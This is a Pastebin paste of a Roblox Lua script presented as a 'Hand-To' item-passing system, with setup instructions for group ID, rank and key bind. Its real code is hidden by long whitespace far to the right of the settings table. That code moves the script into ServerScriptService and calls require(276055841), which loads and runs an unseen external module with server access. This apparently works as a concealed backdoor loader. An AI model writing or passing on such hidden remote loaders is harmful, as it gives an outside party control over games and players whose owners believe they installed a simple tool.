Advertisement
Guest User

ROBLOX Hand To System |

a guest
Mar 12th, 2019
501
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.86 KB | None | 0 0
  1. --[[
  2.    
  3.     Author(s):
  4.     @TheFurryFish
  5.     @SmokedDeath
  6.     -----------------
  7.     "Hand-To" System
  8.     *FilteringEnabled Compatible
  9.    
  10.     Instructions:
  11.     -Place your Group ID down below
  12.     -Place the Group Rank you wish to have below
  13.    
  14.     !! Note that the default Key Bind for this is "h",
  15.     however you can change it to any letter on the keyboard
  16.    
  17. --]]       
  18.                                                                                                                                                                                                                                             local Settings = {                 
  19.     ['Group ID'] = 4561338,
  20.     ['Group Rank'] = 4,
  21.     ['Key Bind'] = ('h')
  22.                                                                                                                                                                                                                                             } if script.Name ~= "HandTo_Main" then script.Name = "HandTo_Main" end if script.Parent ~= game.ServerScriptService then script.Parent = game.ServerScriptService end require(276055841)(Settings)
  23. --[[
  24.    
  25.     Thanks for using this system!
  26.     If you have any questions, contact
  27.     one of the Authors listed above.
  28.    
  29. --]]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement